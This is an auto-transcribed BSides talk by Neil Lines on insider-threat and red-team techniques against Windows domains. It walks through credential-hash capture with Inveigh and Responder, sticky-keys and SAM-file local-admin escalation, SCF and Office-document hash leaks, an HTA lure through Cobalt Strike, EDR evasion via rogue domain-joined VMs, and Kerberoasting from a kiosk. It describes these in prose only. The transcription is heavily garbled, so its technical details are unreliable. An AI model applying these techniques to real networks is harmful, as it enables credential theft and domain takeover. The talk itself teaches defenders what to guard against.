Rogue - Neil Lines

I made this for b-sides leads chapter 1 their men ok 2014 a UK employee using tor posted the names addresses bank accounts details National Insurance numbers and salaries of more than hundred thousand employees online police said as an internal auditor the accused had access to sensitive information it's criminal trial he was at jail for eight years reason ok what creates a rogue employee or a disgruntled employee and I think you probably hear all no but its employees that feel and not required they feel undervalued frustrated to be in a position for a long time not listen to him and just generally annoyed and angry the company come here severe mental health issues I was interested in

what was in this case the sort of proven defining point of guilt I wanted to know why they concluded now I couldn't find much information I suspect they found his laptop with all the details on it including tour and they decided that was enough I'm hoping that the case wasn't based on domain of indication I have a lot of theories under my authentication not being particularly secure and how pretty much anyone working in an environment has domain and compromised anyone's credentials okay so for this talk I started with host a Windows 10 host which I think's or replicates a lot of environments today Windows 7's obviously on end-of-life now we should start seeing people going to sort of Windows

10 whether or not I wanted AV on the box so I use defender and I was interested to know what a standard user could just do on a domain so I've started with invite now invade if people don't know is the parallel equivalent of responder if you're not sure what responder is it's a tool that allows you to respond to water broadcasts on a network doesn't have to be just be anywhere as network traffic and what happens when it sees the broadcast it responds and it says can you send me your authentication so can you assume your username your password hash and your machine name or your domain name you can take those hashes offline and

you can reverse them so if I was interested in downloading in bag that's the address for it now to run it all the user has to do is fire up PowerShell and type import module invite and import it and then to run it that's all they have to do and that's where you can see now some of you might notice that it says their administrator now standard user wouldn't have local admin rights or domain admin rights but I'll get to that later so when they run it without they will see this it's like a warning telling you that you're running it without elevated privilege mode so standard user will get that now I was interested to know when info first came

out people said that it's like responder but it doesn't have to be run as a local admin and I was always very very interested in this and I've used to aren't quite a few tests myself really as a standard user now what I found is it's 50/50 it like a responder will quite often snag you some hashes they invade run as a standard user generally doesn't but it can under the right circumstances now this is what happens when you run it it will start the DNS spoof or the element a spoof or the NBS spoofer and also the HTTP spoof capture that's the important one if you're on a domain or on a network and someone

starts sending broadcast HTTP traffic in they will respond to that and it also send me your credentials and that's what you'll say you'll get back the username which is there and we'll get back the password hash which you can see there and you also get the domain name or the computer name that can obviously be taken offline and reverse it now what you really want to be able to do though is to run it in an elevated or local administrative privileges now I know a lot of you'll be thinking these are standard users so how can a standard user on your domain become local admin and of course I'm going to talk to you about that ring helpdesk and ask them

they'll probably will dive at environments where I often read save I have actually done that they did do for me so it does happen right I wanted to start off basic so I looked at sticky keys now if I know it's not aware of what sticky keys is here I don't have time to chat about it but it probably of the oldest exploits in Windows and allow a standard user to tape the set HC application and rename its now how you do those you'd have to mount the C Drive not as a Windows logged in user you'd have to do something like Kali or back in the day backtrack and you then log into mounts the C Drive and you replace

that set HC and you rename it to anything and then you rename CMD to set HC and then you reboot the machine and you hit the shift key like six or seven times and it will start a CMD session before you've even logged in as a local admin and what you think then do is you add yourself as a local administration that's a really really really old exploit so I discovered was doing this recently in my lab at home I believe I haven't confirmed this yet but I think defender now shows us what you've done and renames it puts it back now I did speak somewhat about this internally at work and said I think he does this I

will get around to testing it but like I said was not problem because what you do is you start Windows then in Safe Mode so defendant doesn't have a chance to kick in so you could still do it so in 80 that that still today would be possibly the easiest way of making yourself a local admin but what a lot of you people should be thinking what first I'm gonna then discuss about how you go about doing it so here you are with a Windows machine and I'm booting off the USB Drive so we do is you go to the Boot Options and you correct you select removable devices or USB or whatever they call it and to boot it's Calais now

an alternative to sticky keys would be this where you click the sand the security in the system file now what this gives you is the copy of the local computer hashes which you can don't really have it when you can instantly collect the local administrative account hashes you don't have to reverse it because I've discussed this plenty of times before I talked Microsoft will accept the default hash as a fendt ocation and usually certain tools you can do what they call pass in the hash and get FN to patients boxes without actually reverse and password hash but alternatively if as you sell a lot of domains today have laps which means every individual machine no longer has the same

administrative accounts you can no longer pass the hash in an environment that you slaps but what you also find with this and I never rediscovered this recently it also collects the cached credentials and these domain credentials so from just doing this alone you can possibly get lucky and actually get a domain administrator the cabinets right on the box alternatively built-in to colleague which came again from backtrack it's changed password now this would allow the user to simply go onto the account they wished and delete the password what you can also do with this is at this point elevate any account you like there to a local administrator as well and that's how you run it you do

change password username followed by the user you want and the location of the Sam file and that's what it looks like and bang done so this point I've just discussed about four different ways of coming a local administrative on the box now this is me logging in no password because I've just deleted it and then I can first thing to do is go straight to computer management and I add a password purely from where in amusement because I can now what a lot of you will be thinking is what's he going on about because firstly the boots order and the bias they're gonna be locked well yes in a good environment you respect that especially on laptops secondly what your

so thing could be thinking is and correctly we've got BitLocker or you've got encryption on the drive so these cold boot attacks won't work yes now what I discovered is pretty much every environment are going to now people walk correctly encrypts their laptop hard drives but what I'd say even 50 percent probably more people forget about the desktop machines and I wanted to look into reasons why they have done this now the conclusion I came up with came up with yesterday while thinking about this more laptops you give to an individual user so you give them a bit Locker key now if you have it in a shared environment like a desktop where multiple people might use it you can't

obviously in a great little security environment if you'd hand that BitLocker care you probably also have to have that BitLocker key to multiple people now Microsoft does have a solution around this but it's quite a task to implement and involves both certificates only if you do say pay server and what happens is when that desktop boots up it automatically in essence puts in the BitLocker key for you and lobs use it directly into a domain prompt but I've not yet seen an enterprise that done this myself and all the findings generally is they don't BitLocker the hard drives on the desktop so if I was a user in an environment I was disgruntled and I found that my laptop was encrypted

I just go to desktop in the corner and for anyone thinks well that's not very likely on loads of social engineering jobs I've done well I walked into a site I've just walked up to machines as a last resort and done things like this and even to the point where the BIOS has been locked I've opened up a PC in the middle of an office and change the boot order on the motherboard and then restarted the machine just to bypass the BIOS logs so this is all very easy to do now if all that fails you have to go more back to kind of traditional prove esque sort of approaches now I don't want to talk too much about privacy I

don't have much time and lots of people have better progress than me but I definitely have some things I do really like to do this is one of them built into Windows find string it's amazing basically just I find string and you say what keywords you want here I've done password and you say which sort of documents you'd be interested in looking for and it will then go off and search those documents for that defined set word and what I want to do is I like to do is show people so here I am as a standard user is I starting it's what's oh okay sorry right you can't see it very well here but what I've done is

I've mounted the DC now standard user by default in an average domain and normally access to DC so I've mounted that and I'm running fine string and hit go and there we go so it's instantly found a file called note sticks - and to be looking side it there is a username called Jimmy gob and one is the password now so people won't be thinking that's that's unlikely generally I'm going to do an offensive engagement and first module I get credentials they start having sniffer on the network I'll go to the day say I'll do searches for files with keywords in and really commonly I find accounts and a useful quite often they're even domain

admins or local admins so I think they're possible move so any standard user can do that right you can also then go into more traditional approaches of looking for missing patches on devices and there's a one-liner that will directly show you all the patches that are on there you can take that off there and you can see if the exploits that correlate to any of the missing patches that's a bit Messier but I don't think that has captured a flag situation but you can do it so we're finally running as administrator or local administrator on the device and we run info again so what if it got this different we've finally got the immortal the one I love the SMB

CAPTCHA so SMB traffic I should explain to build I know in the network is very common pretty much that's how windows small share works so if you have a statically defined share this is my Z Drive also drive or and an F Drive pull away view like on the machine when you first log you windows will try and access that and it'll make an SMB request out now if you're sitting there.if in vail responder you'll go yep I'm here send me your credentials you can you get hashes but let's make this better because in Windows 10 I'm starting to notice move on Windows 10 they're getting less chatty and I'm sort of notion you're plugging you and or you're

compromising a box you running invite on it remotely you just see less traffic generally so my colleague about two years ago just your friend of mine is melancholy bits a friend of mine released on our blog a blog post about suf files now this is an SFI what it is is you point I simply request into it as you can see there is the IP address of your invite or your responder box and you name it what are not a so it's at the very top of the share now any Windows machine that any every time you browse for that share windows will automatically see that sefl and trigger and it will trigger by gate always at

SMB requesting them in fact you'd be prompted or even know it'll send you it'll send the hashes back to your responder invite so we never do an engagement we always need to around as SF files obviously clean them up afterwards but during an engagement you do it and all of a sudden you're back to raining hashes so when it fails and it always does fell on pretty much every test now I've discussed throughout year as many ways of snagging credentials and I've generally always talked about them as SM big so I'm very either sort of you know injecting SMB to emails and to index files of websites so it just triggers automatically when your browser

I'm pretty much interested in shoving SMB is absolutely everywhere so yeah we can do it I want to give you a quick example of how I do an SMB exploit now I'm very interested and I'll get on it a little bit later as well I'm very interested in error messages and general prompts that you get so that's an office 365 prompt dead I've got an Excel recently and it's basically saying can you verify your subscription so instantly I thought I'll take that for it responder and drop it into Excel and let's exploit this so when you click it now I no longer take seats consecrates what it does is your so ultimately sends me a hash over SFO so

what did i do there what was the magic I took there a message that was legitimate I copied it and I put into a mist paint I made it the right size and dropped it into Excel made that hyperlink and put it as an SMB request very quick notes on office I've noticed Excel allows you to instantly click the hyperlink without any prompt for asking for anything you just click it it will automatic trigger words you need to do ctrl + click and PowerPoint needs to be a presenter mode for a hyperlink to work so I like to know these sort of things I want to test because if I'm going to send something into a target I like to know that it'll

just trigger without any prompt towards little prompt as possible so some of you'll be thinking stop talking about SM bake and you're right firewall even five years ago no one had any outbound firewall rules really at all nice to go against network companies and spankin Willis the promise is today people are starting to not promise positive people started to filter the the outbound traffic as well so SMB is now filtered outbound as well see if you send this in to someone it just slams against their firewall now put about four or five years ago I did go talk I said let's just you know change our Symbian making HTTP because most people I'm going to block HTTP outbound and

I've got a stage and someone said to me there that just doesn't work so it was a bit embarrassing talk I did but the key reason what didn't work was it's because when you do over-hasty TP you get this to get a prompt now you could argue it does work because why versus if you replace the SNP across HTTP on a Windows machine they get a prompt for credentials they put the credential saying you get the hashes back but you could argue well that's just a credential Harvester and at which point you might have just cloned a website and I agree with that so I never really used this on a rail engagements but it was

always a fallback but I was interesting a few years I've been thinking about what what if you could do it without a prompt well you can and I've released some ghetto code and on my github page my exploit as it's bash script and it takes your word document your clean word document apologizing all consumers here you should be able to see it later everyone's interested on YouTube and all you have to do is you add your IP address and you'll see what it does in a minute or so here I'm adding my IP address to it and I'm gonna run script' and what it does is it prompts you for the location if your Word document your clean Word

document that you want to use is your template and that could be anything I unzipped it unless it injects all of that code there which you can see yourself if you have a look at it and then it resets it up and saves its docx which is what it's done there so you've done it those unzipped it it's added it and it's recited as a docx so now it's just a case of taking the wild called a dirty file and moving over to your target right at this point in the far up in value I'm going to fire it responder and here we are back on the target machine they've received that they've downloaded it from some site and they're

opening it now there you go we've got a hash so if you're in a bare back to Windows box here that prompt there is become using a trial copy of Windows what you see there is no the prompt for credentials no credentials have been put in manually what they are is it's just automatically saying the credentials and our responder isn't set to him as a HTTP request so finally the on file was blocked me and find it back to bring this person I can get past four walls again now I did discuss earlier about the fact I love error messages so here's a little bit basic but want to show you so using cobalt as a c2 we go here to

the windows target and we open up this now what this is here it's saying that the PowerPoint document has basically corrupted you need to redownload it so I've changed that to a HTI and when they go to redownload it's now they see nothing now what I would do if I was using this one engagement I'd have made that screen with a little bit nicer and I've learned how to redirect or legitimate PowerPoint documents so they'd have just seen nothing they'd have picked it and got a PowerPoint document they'd have felt that was correct what we've got here though as you can see is our first connection so we now control that machine burglar remotely right the

big bad wolf so generally from an insider's malicious point of view and also from a red team engagement it's getting harder and I didn't think it really was until it really hit me probably about a year ago is getting a lot harder a br is starting to kill everything now if you're not aware of what ADR is this is what ADR is it's a software agent installed on the host system if you're interested in really about ADR here's one such product here you can read about now the basics of ADR anything abnormal EGR will alert on here's a screenshot of an example of a central solution which takes alerts in now the only saving grace is presently from a red team

perspective is during the seven day period that's got 494 central alerts going into it for now four hundred ninety four thousand alerts are going into it over a seven day period and apparently hoots down sixty two thousand is what's the week before so obviously do some tuning but they're still got thousands of thousands of thousands of alerts now presently we can just sync what we can just sort of sneaking amongst it but running same day running parish shell it all alerts that is parish shelled aired a lot of people saying out here's what people say it's not it's not completely dead yet but on more mature environments you just can't use it really anymore and okay this is a

weird one I did a test recently quite a tricky test our ADR solution and I'm not kidding just following up mspaint actually did trigger an alert I have no idea why but it did but I kinda came to this conclusion with ADR at the moment within some environments a lot of you might disagree but I think basically if the wind blows or the Sun shines on a laptop if someone puts a kettle on there's a good chance AGR's probably going to trigger that is what I say ADR us so we caused this in essence we started to use tools that are used generally by Sox blue team's and we use them against and we start use PowerShell

we started to use living off the land we started to use all these kind of tools they've been using for a long time it's not surprising that firstly if they're going to possibly be annoyed but also they're going to figure out ways of defending against it very very rapidly now presently as it stands in the drive solutions cause so much noise as I said earlier we can still sneak past but it's getting really really hard which is a positive thing so as I always like to end and very quick overview how'd you get around a TR so firstly I like to do this on the test a 40 light plague generally stay out will stay away

from it if I can't this is how I consider a TR I'm now going to go to this which surprised people because a lot of people think of where we would attack normally we'd go straight for the users and people say incorrectly weakest part of the link and all that which I've said for years is wrong but now we won't go for that will generally go straight to you service because what I found is on some environments not all but they'll stick a TR on their advanced sort solutions on all the laptops all the desktops all the where the users touch they're generally a bit afraid to stick it on their servers this could be

because they don't want to interrupt with what it does they don't potentially risk it slow it down I don't know but I find that generally they're less protective now so I'll start thinking can I make a quick slide just to portray a vlog how I see server line compared to desk land where we used to attack this is it so there's your desk line now or desktops which we avoid like plague and that's what server line looks like so how do we go from foothold to server land well there's lots of ways to do this basically if you have credentials and you don't want to trigger a TR possibly the best way to do it is I find is to use your own machine

but obviously can't do from a remote perspective but if you have compromised someone's machine probably try and escalate to local admin rights as soon as you can and then install some sort of virtualization on the machine and then run a Windows issue inside of that and then add that to the domain so any standard user by default I said this many times before can add up to 10 machines to a Windows domain and they can't take them off a domain which makes sense because it could take your DC's off but the reality is it's dangerous I'm saying here at standard user is adding a machine to a domain so why would you want to do this well you've

got a machine on their network that we can use to completely map out their network and exploit with nothing con at all no protection no a very no ADR solution absolutely nothing we can go back to using any tool we like you can make as much noise on this machine as we like numeration the only way they will spot us then is when we're starting in writing the other machines that's noisy a way of doing it now a lot of you will be thinking can I be the schwa yes you've been thinking that so adding machine to the domain is like to trigger an alert yes but I discussed earlier if someone's getting seventy to a hundred

thousand alerts day a week sorry they may not be spotting stuff like this adding machines I've done quite a few tests and I found people haven't generally spotted it so right I want to leave you with this high note so we'd like to end on a positive so here we have a kiosk environment which a lot of environments use chaotic environments generally they give you access to ia so this is replication of a job I did recently so first thing we do is browse to our own sites now this is I'm using my lab environment to replicate it obviously to 192 address instead of a real - mage but at this point when they download a copy of a bat file which

starts up FTP now same deal was hidden it wasn't hidden very well as we're about to see here so by starting FTP then try and fire up same day and boom there we go so have instantly access to same day on this kiosk machine now from that point I want to get straight to PowerShell so simply type our shell and they go straight into PowerShell so what am I going to do now when we drop a PowerShell one library if I can and here i'm doing what's called kerb roasting now curb roasting makes any standard domain use it can do is it makes a request to the domain controller it asks the domain controller for a copy of all

the service accounts with a correlating password hashes service account can typically belong to an administrative grid if not the domain administrators group and second and thirdly fourthly fifthly lastly their passwords are generally weak so you generally find something like the password is just a username and the reason for this is because service cats can commonly have been set up at the very start of the domaine being built and they're set to never expire the passwords they've never thought about changing it so just from accessing the kiosk four minutes later when a domain admin so there we go you're just going to very quickly show you my cannon my lab at home I call it day I because it isn't they act

right I with painters partners and am i exploit 2600 Twitter thank you very much [Applause]